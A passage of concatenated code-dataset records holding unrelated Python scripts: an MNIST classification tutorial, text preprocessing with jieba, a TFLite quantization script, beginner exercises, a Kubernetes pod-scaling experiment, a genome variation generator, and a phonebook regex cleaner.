sgd_clf.decision_function([some_digit])\r\nsome_digit_scores\r\n# Out[37]:\r\n# array([[-144544.32935261, -468242.9475172 , -402736.0614126 ,\r\n# -224430.32617788, -464528.52072681, 110733.94625458,\r\n# -567203.44947276, -472713.16588395, -683068.6746175 ,\r\n# -494461.82529041]])\r\n# The highest score is indeed the one corresponding to class 5\r\n\r\nnp.argmax(some_digit_scores)\r\n# Out[38]: 5\r\nsgd_clf.classes_\r\n# Out[39]: array([0., 1., 2., 3., 4., 5., 6., 7., 8., 9.])\r\nsgd_clf.classes_[5]\r\n# Out[41]: 5.0\r\n\r\nfrom sklearn.multiclass import OneVsOneClassifier\r\novo_clf = OneVsOneClassifier(SGDClassifier(random_state=42))\r\novo_clf.fit(X_train, y_train)\r\novo_clf.predict([some_digit])\r\n# Out[42]: array([5.])\r\nlen(ovo_clf.estimators_)\r\n# Out[43]: 45\r\n\r\n# Training a RandomForestClassifier is just as easy\r\n# from sklearn.ensemble import RandomForestClassifier\r\n# forest_clf = RandomForestClassifier(random_state=42)\r\nforest_clf.fit(X_train, y_train)\r\nforest_clf.predict([some_digit])\r\n# Out[44]: array([5.])\r\nforest_clf.predict_proba([some_digit])\r\n# Out[45]: array([[0., 0., 0., 0., 0., 1., 0., 0., 0., 0.]])\r\n\r\ncross_val_score(sgd_clf, X_train, y_train, cv=3, scoring=\"accuracy\")\r\n# Out[46]: array([0.8704759 , 0.85054253, 0.84927739])\r\n\r\n# simply scaling the inputs increases accuracy above 91%\r\nfrom sklearn.preprocessing import StandardScaler\r\nscaler = StandardScaler()\r\nX_train_scaled = scaler.fit_transform(X_train.astype(np.float64))\r\ncross_val_score(sgd_clf, X_train_scaled, y_train, cv=3, scoring=\"accuracy\")\r\n# Out[47]: array([0.91106779, 0.90869543, 0.91153673])\r\n\r\n\r\n#%% Error Analysis\r\n# First, you can look at the confusion matrix. You need to make predictions using the\r\n# cross_val_predict() function, then call the confusion_matrix() function\r\ny_train_pred = cross_val_predict(sgd_clf, X_train_scaled, y_train, cv=3)\r\nconf_mx = confusion_matrix(y_train, y_train_pred)\r\nconf_mx\r\n\r\nplt.matshow(conf_mx, cmap=plt.cm.gray)\r\nplt.show()\r\n\r\n# Let’s focus the plot on the errors. First, you need to divide each value in the confusion\r\n# matrix by the number of images in the corresponding class, so you can compare error\r\n# rates instead of absolute number of errors\r\nrow_sums = conf_mx.sum(axis=1, keepdims=True)\r\nnorm_conf_mx = conf_mx / row_sums\r\n\r\n# Now let’s fill the diagonal with zeros to keep only the errors, and let’s plot the result\r\nnp.fill_diagonal(norm_conf_mx, 0)\r\nplt.matshow(norm_conf_mx, cmap=plt.cm.gray)\r\nplt.show()\r\n\r\n# Looking at this plot, it seems that your efforts should be spent on improving\r\n# classification of 8s and 9s, as well as fixing the specific 3/5 confusion\r\n# let’s plot examples of 3s and 5s\r\ncl_a, cl_b = 3, 5\r\nX_aa = X_train[(y_train == cl_a) & (y_train_pred == cl_a)]\r\nX_ab = X_train[(y_train == cl_a) & (y_train_pred == cl_b)]\r\nX_ba = X_train[(y_train == cl_b) & (y_train_pred == cl_a)]\r\nX_bb = X_train[(y_train == cl_b) & (y_train_pred == cl_b)]\r\n\r\ndef plot_digits(instances, images_per_row=10, **options):\r\n size = 28\r\n images_per_row = min(len(instances), images_per_row)\r\n images = [instance.reshape(size,size) for instance in instances]\r\n n_rows = (len(instances) - 1) // images_per_row + 1\r\n row_images = []\r\n n_empty = n_rows * images_per_row - len(instances)\r\n images.append(np.zeros((size, size * n_empty)))\r\n for row in range(n_rows):\r\n rimages = images[row * images_per_row : (row + 1) * images_per_row]\r\n row_images.append(np.concatenate(rimages, axis=1))\r\n image = np.concatenate(row_images, axis=0)\r\n plt.imshow(image, cmap = matplotlib.cm.binary, **options)\r\n plt.axis(\"off\")\r\n\r\n\r\nplt.figure(figsize=(8,8))\r\nplt.subplot(221); plot_digits(X_aa[:25], images_per_row=5)\r\nplt.subplot(222); plot_digits(X_ab[:25], images_per_row=5)\r\nplt.subplot(223); plot_digits(X_ba[:25], images_per_row=5)\r\nplt.subplot(224); plot_digits(X_bb[:25], images_per_row=5)\r\nplt.show()\r\n\r\n\r\n#%% Multilabel Classification\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\n\r\ny_train_large = (y_train >= 7)\r\ny_train_odd = (y_train % 2 == 1)\r\ny_multilabel = np.c_[y_train_large, y_train_odd]\r\n\r\nknn_clf = KNeighborsClassifier()\r\nknn_clf.fit(X_train, y_multilabel)\r\n\r\n# This code creates a y_multilabel array containing two target labels for each digit\r\n# image: the first indicates whether or not the digit is large (7, 8, or 9) and the second\r\n# indicates whether or not it is odd\r\nknn_clf.predict([some_digit])\r\n# Out[20]: array([[False, True]])\r\n\r\n# This code computes the average F1 score across all labels\r\n# Warning: the following cell may take a very long time (possibly hours depending on your hardware).\r\n# y_train_knn_pred = cross_val_predict(knn_clf, X_train, y_train, cv=3)\r\n# f1_score(y_train, y_train_knn_pred, average=\"macro\")\r\n\r\n#%% Multioutput Classification\r\n# Let’s start by creating the training and test sets by taking the MNIST images and\r\n# adding noise to their pixel intensities using NumPy’s randint() function. The target\r\n# images will be the original images\r\nnoise = np.random.randint(0, 100, (len(X_train), 784))\r\nX_train_mod = X_train + noise\r\nnoise = np.random.randint(0, 100, (len(X_test), 784))\r\nX_test_mod = X_test + noise\r\n\r\ny_train_mod = X_train\r\ny_test_mod = X_test\r\n\r\nsome_index = 5500\r\nplt.subplot(121); plot_digit(X_test_mod[some_index])\r\nplt.subplot(122); plot_digit(y_test_mod[some_index])\r\nplt.show()\r\n\r\nknn_clf.fit(X_train_mod, y_train_mod)\r\nclean_digit = knn_clf.predict([X_test_mod[some_index]])\r\nplot_digit(clean_digit)\r\n","repo_name":"ranchirino/machine-learning-with-scikit-learn-and-tensorflow","sub_path":"3_mnist.py","file_name":"3_mnist.py","file_ext":"py","file_size_in_byte":13978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"9900013694","text":"import pandas as pd\nimport jieba\nimport re\nimport numpy as np\nfrom gensim.models import Word2Vec\n\n\njieba.set_dictionary('dict.txt.big.txt')\nmodel = Word2Vec.load('word_embedding.wv')\n\n\ndef embedding_map(product_name):\n # product_name = df['product name'].tolist()\n segment_sentence = []\n temp_list = [''.join(re.split(r'\\W+', sentence.lower())) for sentence in product_name]\n lens = []\n extra_list = []\n after_cut_list = []\n for sentence in temp_list:\n text = jieba.lcut_for_search(sentence)\n text_length = len(text)\n lens.append(text_length)\n after_cut_list.append(text)\n max_length = max(lens)\n for sent_list in after_cut_list:\n tem_word_list = []\n for word in sent_list:\n try:\n word_vector = model.wv[word]\n tem_word_list.append(word_vector)\n # print(word_vector)\n except:\n print(word)\n extra_list.append([word])\n sent_length = len(tem_word_list)\n if sent_length < max_length:\n for i in range(max_length - sent_length):\n tem_word_list.append(np.zeros(400))\n\n segment_sentence.append(np.array(tem_word_list))\n return np.array(segment_sentence), max_length, extra_list\n\ndef clean_files(train, test):\n df = pd.read_csv(train,\n names=['product name', 'category', 'query', 'event', 'date'])\n\n product_name_train = df['product name'].tolist()\n\n query_list = df['query'].tolist()\n\n query_word_list = [sentence.split(' ') for sentence in query_list]\n for ls in query_word_list:\n for word in ls:\n jieba.add_word(word)\n\n segment_sentence_train, length_train, extra_list1 = embedding_map(product_name_train)\n\n label_vector, length_label, extra_list3 = embedding_map(query_list)\n # for i in query_list:\n # label_vector.append(model.wv[i])\n\n\n\n # category_list = df['category'].tolist()\n # category_label = []\n # for i in category_list:\n # if i == 'Male Fashion':\n # category_label.append(1)\n # elif i == 'Female Fastion':\n # category_label.append(2)\n # elif i == 'Mobile & Gadgets':\n # category_label.append(3)\n #\n # event_list = df['event'].tolist()\n # event_label = []\n # for i in event_list:\n # if i == 'Impression':\n # event_label.append(1)\n # else:\n # event_label.append(0)\n\n\n df2 = pd.read_csv(test)\n\n product_name_test = df2['Product Name'].tolist()\n\n segment_sentence_test, length_test, extra_list2 = embedding_map(product_name_test)\n\n\n return segment_sentence_train, length_train, label_vector, segment_sentence_test, length_test, length_label , extra_list1, extra_list2, extra_list3\n\n","repo_name":"RykerC/shop_keyword","sub_path":"pre_process.py","file_name":"pre_process.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40300564494","text":"from noc.core.loader.base import BaseLoader\nfrom .base import BaseDownloader\n\n\nclass DownloaderLoader(BaseLoader):\n name = \"downloader\"\n ignored_names = {\"base\", \"loader\"}\n base_cls = BaseDownloader\n base_path = (\"main\", \"refbooks\", \"downloaders\")\n\n\n# Create singleton object\nloader = DownloaderLoader()\n","repo_name":"nocproject/noc","sub_path":"main/refbooks/downloaders/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"51"} +{"seq_id":"40114887196","text":"#exercicio1\n#Faça um Programa que peça um valor e mostre na tela se o valor é positivo ou negativo.\n\n# num = int(input('Digite um numero:'))\n#\n# if num > 0 :\n# print('Positivo')\n# elif num == 0:\n# print('Neutro')\n# else:\n# print('Negativo')\n\n#exercicio2\n#Faça um Programa que peça dois números e imprima o maior deles.\n# num1 = int(input('Digite o primeiro numero: '))\n# num2 = int(input('Digite o segundo numero: '))\n#\n# if num1 > num2 :\n# print('Primerio numero maior com valor: {}'.format(num1))\n# elif num2 == num1:\n# print('Os numeros são iguais')\n# else:\n# print('Segundo numero maior com valor: {}'.format(num2))\n\n#exercicio7\n#Crie um programa que peça uma nota de trabalho e uma de prova (as duas de 0 a 100).\n#Se a média aritmética das notas for maior ou igual a 60, escreva “Aprovado”, se não, “Reprovado”.\n\n# nota = int(input('Digite a nota do trabalho: '))\n#\n# if nota >= 60:\n# print('Aprovado')\n# else:\n# print('Reprovado')\n\n#exercicio10\n#Construa um programa que mostre menu exatamente como o exemplo abaixo e implemente as funções necessárias:\n#== Menu de Opções ==\n# 1. Somar 2 números\n# 2. Potência de um número\n# 3. Raiz de grau N\n#== Opção escolhida:\ndef somar():\n num1 = int(input('Digite o primeiro numero: '))\n num2 = int(input('Digite o segundo numero: '))\n print('Resultado é: {}'.format(num1+num2))\n\ndef potencia():\n num = int(input('Digite o numero: '))\n potencia = int(input('Digite a pontencia: '))\n print('Resultado é: {}'.format(num ** potencia))\n\ndef raiz():\n num = int(input('Numero para achar raiz quadrada: '))\n grau = int(input('Numero para o grau da raiz: '))\n print('Resultado é: {}'.format(num ** (1/grau)))\n\nwhile True :\n print('== Menu de Opções ==')\n print(' 1. Somar 2 números')\n print(' 2. Potência de um número')\n print(' 3. Raiz de grau N ')\n print(' Qualquer tecla pra Sair')\n\nopcao = int(input(\"Opção escolhida\"))\nif opcao == 1:\n somar()\nelif opcao == 2:\n potencia()\nelif opcao == 3:\n raiz()\nelse:\n False\n","repo_name":"fabioshot/topespeciais","sub_path":"3trimestre/exercicios/lista2.py","file_name":"lista2.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"730194068","text":"\"\"\"Colete a idade de duas pessoas.\nE informe se a primeira idade é maior do que a da primeira. Neste aqui, basta responder\nTrue para informar que a primeira idade é maior que a primeira.\"\"\"\n\npessoa1 = int(input((\"Qual a idade da primeira pessoa? \")))\npessoa2 = int(input((\"Qual a idade da segunda pessoas? \")))\n\nif pessoa1 > pessoa2:\n print(\"True\")\nelse:\n print(\"False\")\n","repo_name":"liviaspereira/luiza_code","sub_path":"lista1/ex14.py","file_name":"ex14.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73526560831","text":"### tf-nightly-2.2.0.dev20200428\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport glob\n\ndef representative_dataset_gen():\n for image in raw_test_data:\n image = tf.image.resize(image, (256, 256))\n image = image[np.newaxis,:,:,:]\n image = image - 127.5\n image = image * 0.007843\n yield [image]\n\n\nraw_test_data = np.load('person_dataset.npy', allow_pickle=True)\n\n# Integer Quantization - Input/Output=float32\nconverter = tf.lite.TFLiteConverter.from_saved_model('saved_model')\nconverter.optimizations = [tf.lite.Optimize.DEFAULT]\nconverter.representative_dataset = representative_dataset_gen\ntflite_quant_model = converter.convert()\nwith open('deeplab_v3_plus_mnv2_decoder_256_integer_quant.tflite', 'wb') as w:\n w.write(tflite_quant_model)\nprint(\"Integer Quantization complete! - deeplab_v3_plus_mnv2_decoder_256_integer_quant.tflite\")\n\n","repo_name":"PINTO0309/PINTO_model_zoo","sub_path":"026_mobile-deeplabv3-plus/01_float32/04_integer_quantization.py","file_name":"04_integer_quantization.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":2990,"dataset":"github-code","pt":"60"} +{"seq_id":"28172506049","text":"def mergeSort(arr, left, right):\n invs = 0\n if(right-left>1):\n mid = (left+right)//2\n invs = invs +mergeSort(arr,left,mid)\n invs = invs +mergeSort(arr,mid,right)\n\n invs = invs +merge(arr,left,mid,right)\n \n return invs\n\ndef merge(arr, left, mid, right):\n tempArr = [0]*len(arr)\n lArr = arr[left:mid]\n rArr = arr[mid:right]\n\n i=0;\n j=0;\n k=0;\n invs = 0;\n\n for k in range(left,right):\n if(i0:\n\t\tpos+=1\n\telse: \n\t\tzero+=1\nprint('%f' % (pos/n,))\nprint('%f' % (neg/n,))\nprint('%f' % (zero/n,))\n","repo_name":"itsjwala/Hackerrank","sub_path":"__algorithms/warmup/plus-minus.py","file_name":"plus-minus.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41259732646","text":"# CTI-110\r\n# P4HW2 - Salary Calculator\r\n# Marc-Anthony Jones\r\n# 11-15-22\r\n# Tells me one or multiple Employee Salary Totals\r\n\r\n\r\ntotal = 0\r\n\r\novertimeRate = 0.5 \r\n\r\n# List\r\novertimePay = []\r\n\r\nRegularPay = []\r\n\r\ngrossPay = []\r\n\r\nwhile True:\r\n \r\n EmployeeName = input(\"\\nEnter employee's name or \\\"None\\\" to terminate: \")\r\n \r\n if EmployeeName == \"None\":\r\n \r\n break\r\n \r\n hours = int(input(\"How many hours did {} worked? \".format(EmployeeName)))\r\n \r\n payRate = float(input(\"What is {}\\'s pay rate? \".format(EmployeeName)))\r\n \r\n x = 0\r\n \r\n OP = RP = GP = 0.0\r\n \r\n if hours > 40:\r\n \r\n x = hours - 40\r\n \r\n OP = x * overtimeRate\r\n \r\n RP = 40 * payRate\r\n \r\n GP = OP + RP\r\n \r\n else:\r\n OP = 0.0\r\n \r\n RP = hours * payRate\r\n \r\n GP = RP\r\n \r\n overtimePay.append(float(OP))\r\n \r\n RegularPay.append(float(RP))\r\n \r\n grossPay.append(float(GP))\r\n \r\n total = total + 1\r\n\r\n # Print Statement\r\n \r\n print(\"Employee Name: \", EmployeeName)\r\n \r\n print(f'Hours Worked Pay Rate Overtime Overtime Pay Regular Pay Gross Pay')\r\n \r\n print(\"---------------------------------------------------------------------------------------------------\")\r\n \r\n print(f'{hours:.2f} {payRate:.2f} {x:.2f} {OP:.2f} {RP:.2f} {GP:.2f}') \r\n\r\n\r\n# Printing Total\r\n\r\nprint(\"Total number of employees entered: \",total)\r\n\r\nprint(\"Total amount payed for overtime: \", sum(overtimePay))\r\n\r\nprint(\"Total amount payed for regular hours: \", sum(RegularPay))\r\n\r\nprint(\"Total amount payed in gross: \", sum(grossPay))\r\n","repo_name":"jonesm4641/cti110","sub_path":"P4HW2_JonesMarcAnthony.py","file_name":"P4HW2_JonesMarcAnthony.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"2807156354","text":"#!/usr/env/python3\n\ncarr = []\nn = int(input())\n\nfor _ in range(0, n):\n carr.append(input())\n\nfor idx in carr:\n _list = list(idx)\n streak = 0\n point = 0\n for i in _list:\n if i == 'O':\n point = point + 1 + streak\n streak += 1\n if i == 'X':\n streak = 0\n print(point)","repo_name":"clang-addicts/algorithm_ashzHax","sub_path":"백준/20220721/8958.py","file_name":"8958.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"45803137360","text":"import logging\nimport random\nimport time\nimport uuid\nfrom collections import defaultdict\nfrom typing import Dict\n\nfrom galileoexperiments.api.model import Pod\nfrom galileoexperiments.utils.constants import function_label, zone_label\nfrom galileoexperiments.utils.helpers import set_weights_rr, EtcdClient\nfrom galileoexperiments.utils.k8s import spawn_pods, get_pods, remove_pods\nfrom galileoexperimentsextensions.mobilenet.app import MobilenetProfilingApplication\nfrom kubernetes import client, config\n\nlogger = logging.getLogger(__name__)\n\nmax_pods = 10\nmax_pods_per_node = 4\nmin_pods = 1\n\netcd_client = EtcdClient.from_env()\nfn_label = 'mobilenet'\nimage = 'edgerun/mobilenet-inference:1.0.0'\npod_prefix = 'deployment'\npod_factory = MobilenetProfilingApplication().pod_factory\netcd_service_key = None\n# store pods by zone, and node\npod_map = defaultdict(lambda: defaultdict(list))\npod_id_idx = 0\nkeys = set()\n\nrandom.seed(42)\n\n\ndef get_load_balancer_pods() -> Dict[str, Pod]:\n pods = fetch_pods('type', 'api-gateway')\n lb = {}\n for pod in pods:\n # pod name, i.e.: go-load-balancer-deployment-zone-b-xwg9c\n pod_name = pod.metadata.name\n zone = f\"zone-{pod_name.split('-')[5]}\"\n ip = pod.status.pod_ip\n # not used\n pod_id = ''\n labels = {\n 'type': 'api-gateway',\n zone_label: zone\n }\n lb[zone] = Pod(pod_id, ip, labels, pod_name)\n return lb\n\n\ndef spawn(cluster, lbs, node, labels):\n postfix = str(uuid.uuid4())[:5]\n # create new instance\n pod_name = spawn_pods(image, f'{fn_label}-{pod_prefix}-{postfix}', node, labels, 1, pod_factory)[0]\n # update internal state to include newly created pod\n pod_map[cluster][node].append(pod_name)\n\n # blocks until pod is available\n get_pods([pod_name])\n\n # update weights\n update_weights(lbs)\n\n\ndef teardown(name):\n remove_pods([name])\n\n\ndef fetch_pod_names(label: str, value: str):\n config.load_kube_config()\n v1 = client.CoreV1Api()\n pods_list = v1.list_namespaced_pod('default')\n pods = []\n for pod in pods_list.items:\n fn_value = pod.metadata.labels.get(label)\n if fn_value == value:\n pods.append(pod.metadata.name)\n return pods\n\n\ndef fetch_pods(label: str, value: str):\n config.load_kube_config()\n v1 = client.CoreV1Api()\n pods_list = v1.list_namespaced_pod('default')\n pods = []\n for pod in pods_list.items:\n if pod.metadata.labels is None:\n continue\n\n fn_value = pod.metadata.labels.get(label)\n if fn_value == value:\n pods.append(pod)\n return pods\n\n\ndef do_chaos(nodes, lbs):\n logger.info(\"Chooses action...\")\n a = random.random()\n\n if a < 0.1:\n logger.info(\"Do nothing\")\n elif 0.1 <= a < 0.5:\n node = random.choice(nodes)\n cluster = node[1]\n node_name = node[0]\n labels = {\n function_label: fn_label,\n zone_label: cluster\n }\n\n logger.info(f\"Try to scale up on node {node_name}\")\n\n too_much_pods = True\n if len(pod_map[cluster][node_name]) < max_pods_per_node:\n no_pods = count_all_pods()\n if no_pods + 1 <= max_pods:\n too_much_pods = False\n\n if too_much_pods:\n logger.info(f\"Scale up on node {node_name} aborted, too many pods already running\")\n else:\n spawn(cluster, lbs, node_name, labels)\n else:\n # first check if enough pods are in the cluster\n no_pods = count_all_pods()\n if no_pods - 1 < min_pods:\n logger.info(f\"Not enough pods ({no_pods}) running to scale down. Minimum: {min_pods}\")\n return\n\n # now we fetch all nodes that have at least one pod instance running\n scale_down_candidates = []\n for node in nodes:\n node_name = node[0]\n cluster = node[1]\n if len(pod_map[cluster][node_name]) > 0:\n scale_down_candidates.append(node)\n\n # select one random node to scale down\n node = random.choice(scale_down_candidates)\n node_name = node[0]\n cluster = node[1]\n logger.info(f\"Scale down on node {node_name}\")\n scale_down(cluster, lbs, node_name)\n\n\ndef count_all_pods() -> int:\n count = 0\n for node_dict in pod_map.values():\n for pods in node_dict.values():\n count += len(pods)\n return count\n\n\ndef scale_down(cluster, lbs, node):\n # choose a random pod on the node\n to_remove = random.choice(pod_map[cluster][node])\n\n # remove pod from internal state\n pod_map[cluster][node].remove(to_remove)\n\n # update load balancer weight of cluster to not include the removed pod anymore\n update_weights(lbs)\n\n # teardown the pod\n teardown(to_remove)\n\n\ndef update_weights(lbs):\n for cluster in lbs.keys():\n # fetch pods in cluster\n pods = get_pods(pods_in_cluster(cluster))\n\n # look for other clusters that node the function\n for lb_cluster, lb_pod in lbs.items():\n if lb_cluster == cluster:\n continue\n else:\n if cluster_hosts_function(lb_cluster):\n pods.append(lb_pod)\n\n # update weights\n keys.add(set_weights_rr(pods, cluster, fn_label))\n\n\ndef pods_in_cluster(cluster):\n pods = []\n for node, node_pods in pod_map[cluster].items():\n pods.extend(node_pods)\n return pods\n\n\ndef cluster_hosts_function(cluster):\n node_function = False\n for node, pods in pod_map[cluster].items():\n if len(pods) > 0:\n node_function = True\n break\n return node_function\n\n\ndef cleanup():\n for node_dict in pod_map.values():\n for pod_list in node_dict.values():\n for pod in pod_list:\n try:\n teardown(pod)\n except Exception:\n pass\n for key in keys:\n etcd_client.remove(key)\n\n\ndef main():\n logging.basicConfig(level=logging._nameToLevel['INFO'])\n\n initial_pod_count = 2\n should_cleanup = True\n duration = 50\n reconcile_interval = 5\n\n logger.info('Start random scaler, that scales up the application at random')\n nodes = [\n ('eb-a-controller', 'zone-a'),\n ('eb-a-jetson-nx-0', 'zone-a'),\n ('eb-b-controller', 'zone-b'),\n ('eb-b-xeon-0', 'zone-b'),\n ('eb-b-xeon-1', 'zone-b'),\n ('eb-c-vm-0', 'zone-c')\n ]\n\n lbs = get_load_balancer_pods()\n\n fn_pods = fetch_pods(function_label, fn_label)\n while len(fn_pods) != initial_pod_count:\n logger.info(f'no function pods \"{fn_label}\" found. sleep 5 seconds...')\n time.sleep(5)\n fn_pods = fetch_pods(function_label, fn_label)\n\n for pod in fn_pods:\n node = pod.spec.node_name\n pod_map[pod.metadata.labels[zone_label]][node].append(pod.metadata.name)\n\n\n start = time.time()\n\n try:\n now = start\n while now <= start + duration:\n do_chaos(nodes, lbs)\n time.sleep(reconcile_interval)\n now = time.time()\n finally:\n if should_cleanup:\n cleanup()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"edgerun/galileo-experiments-tdis-2022","sub_path":"evaluation/scenario/randomscheduler/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7186,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"39034370898","text":"N=int(input())\narr=[list(input()) for _ in range(N)]\n\ndef quad(x,y,N):\n color=arr[x][y]\n for i in range(x,x+N):\n for j in range(y,y+N):\n if arr[i][j]!=color:\n print(\"(\",end=\"\")\n quad(x,y,N//2)\n quad(x,y+N//2,N//2)\n quad(x+N//2,y,N//2)\n quad(x+N//2,y+N//2,N//2) \n print(\")\",end=\"\") \n return\n\n if color=='0':\n print(0,end=\"\")\n else:\n print(1,end=\"\")\n \n\nquad(0,0,N)","repo_name":"wogkr810/coding-test","sub_path":"백준/Silver/1992. 쿼드트리/쿼드트리.py","file_name":"쿼드트리.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10128413756","text":"import os\nimport random\nfrom Bio.Graphics.BasicChromosome import _ChromosomeComponent\nimport itertools\n\n__author__ = 'anton'\nimport sys\n\nnucls = \"ACGT\"\ndefault_rate = 0.05\nlen_range = (3000, 15000)\nsys.path.append(\"src/spades_pipeline\")\n\nimport SeqIO\n\n\ndef Mutate(seq, rate):\n s = list(seq)\n for i in range(len(seq)):\n if s[i] in nucls and random.random() < rate:\n s[i] = random.choice(nucls)\n return \"\".join(s)\n\n\ndef RandSegment(reference, len_r):\n pos = random.randint(0, len(reference) - len_r[1])\n return reference[pos : pos + random.randint(len_r[0], len_r[1])]\n\n\ndef GenerateInsertions(numins, result):\n ref = \"\".join(result)\n insertions = []\n for i in range(numins):\n seq = Mutate(RandSegment(ref, len_range), default_rate)\n insertions.append((random.randint(0, len(result)), seq))\n return sorted(insertions)\n\n\ndef GenerateDeletions(numdel, result):\n deletions = []\n for i in range(numdel):\n l = random.randint(0, len(result) - len_range[1])\n r = l + random.randint(len_range[0], len_range[1])\n if result[l:r].find(\"$\") == -1:\n deletions.append((l, r - l))\n return sorted(deletions)\n\ndef GroupByChrom(positions, reference):\n last = 0\n i = 0\n result = []\n for l in [len(r) for r in reference]:\n last += l\n tmp = []\n while i < len(positions) and positions[i][0] < last:\n tmp.append((positions[i][0] + l - last, positions[i][1]))\n i += 1\n result.append(tmp)\n return result\n\ndef Apply(seq, ins, d):\n result = []\n i = 0\n j = 0\n last = 0\n l = 0\n while i < len(ins) or j < len(d):\n if i < len(ins) and (j == len(d) or ins[i][0] < d[j][0]):\n if last < ins[i][0]:\n result.append(seq[last:ins[i][0]])\n l += ins[i][0] - last\n sys.stdout.write(\"Insertion: \" + str(l) + \" \" + str(l + len(ins[i][1])) + \"\\n\")\n result.append(ins[i][1])\n l += len(ins[i][1])\n last = ins[i][0]\n i += 1\n else:\n if last < d[j][0]:\n result.append(seq[last:d[j][0]])\n l += d[j][0] - last\n sys.stdout.write(\"Deletion: \" + str(l) + \" \" + str(d[j][1]) + \"\\n\")\n last = d[j][0] + d[j][1]\n j += 1\n result.append(seq[last:])\n return \"\".join(result)\n\ndef Generate(input, output, numins, numdel):\n reference = list(input)\n result = \"\".join([ch.seq for ch in reference])\n l = sum([len(ch) for ch in reference])\n ins = GroupByChrom(GenerateInsertions(numins, result), reference)\n d = GroupByChrom(GenerateDeletions(numdel, result), reference)\n for ch_ins, ch_d, chrom in itertools.izip(ins, d, reference):\n sys.stdout.write(\"Chromosome \" + chrom.id + \"\\n\")\n rec = SeqIO.SeqRecord(Apply(chrom.seq, ch_ins, ch_d), chrom.id)\n SeqIO.write(rec, output, \"fasta\")\n\nif __name__ == '__main__':\n Generate(SeqIO.parse(open(sys.argv[1], \"r\"), \"fasta\"), open(sys.argv[2], \"w\"), int(sys.argv[3]), int(sys.argv[3]))\n","repo_name":"ablab/spades","sub_path":"assembler/src/tools/IlluminaTech/generate_variations.py","file_name":"generate_variations.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":623,"dataset":"github-code","pt":"60"} +{"seq_id":"30252981639","text":"\"\"\"\n 读取excel表格信息\n\"\"\"\nimport openpyxl\nimport os\nimport copy\nfrom common.ReadPath import EXCEL_PATH\n\n\nclass ReadExcel:\n def __init__(self):\n self.EXCEL_PATH = EXCEL_PATH\n # 用来存放数据\n self.data = {}\n self.subdata = []\n # 判断文件夹路径是否存在\n if os.path.exists(self.EXCEL_PATH) is False:\n os.makedirs(self.EXCEL_PATH)\n raise(self.EXCEL_PATH+\"路径不存在\")\n\n # 读取excel表格路径\n def read_excel_path(self):\n excels_path = []\n for root, dirs, files in os.walk(self.EXCEL_PATH):\n for i in files:\n excel_path = os.path.join(root, i)\n excels_path.append(excel_path)\n\n for excel_file in excels_path:\n excel_xlsx_file = openpyxl.load_workbook(excel_file, read_only=True)\n for excel_sheet in excel_xlsx_file.sheetnames:\n sheet = excel_xlsx_file[excel_sheet]\n max_row = sheet.max_row\n max_column = sheet.max_column\n if max_row > 1 and max_column > 1:\n for row in range(2, max_row + 1):\n for col in range(1, max_column+1):\n key = sheet.cell(row=1, column=col).value\n self.data[key] = sheet.cell(row=row, column=col).value\n data = copy.deepcopy(self.data)\n self.subdata.append([excel_sheet, data])\n return self.subdata\n","repo_name":"fuyaolin/FYL_API_AT","sub_path":"common/ExcelRead.py","file_name":"ExcelRead.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"8679789501","text":"from pprint import pprint\nimport re\nimport csv\n## Читаем адресную книгу в формате CSV в список contacts_list:\n\nwith open(\"phonebook_raw.csv\", encoding='UTF-8') as f:\n rows = csv.reader(f, delimiter=\",\")\n contacts_list = list(rows)\npprint(contacts_list)\n\n## 1. Выполните пункты 1-3 задания.\ncorrect_list = []\nfor contact in contacts_list[0:]:\n name = ' '.join(contact[0:3]).split(' ')\n contact[0:3] = name[0:3]\n pattern_num = r'(\\+7|8)?(\\s*)(\\(*)(\\d{3})(\\)*)(\\s*)(\\-*)(\\d{3})(\\-*)(\\d{2})(\\-*)(\\d{2})(\\s*)(\\(*)(доб)*(\\.*)(\\s*)(\\d+)*(\\)*)'\n substitusion_num = r'+7(\\4)\\8-\\10-\\12\\13\\15\\16\\18'\n result = re.sub(pattern_num, substitusion_num, contact[5])\n contact[5] = result\n correct_list.append(contact)\n\ncontacts = {}\nfor i in correct_list:\n if i[0] not in contacts:\n contacts[i[0]] = i[1:]\n else:\n list1 = contacts.get(i[0])\n for j in range(1, 6):\n if (list1[j-1] == '' and i[j] != ''):\n list1[j-1] = i[j]\n contacts[i[0]] = list1[1:]\n\nfinal_list=[]\nfor key, value in contacts.items():\n value.insert(0, key)\n final_list.append(value)\n\n## 2. Сохраните получившиеся данные в другой файл.\n## Код для записи файла в формате CSV:\nwith open(\"phonebook.csv\", \"w\", newline='', encoding='UTF-8') as f:\n datawriter = csv.writer(f, delimiter=',')\n ## Вместо contacts_list подставьте свой список:\n 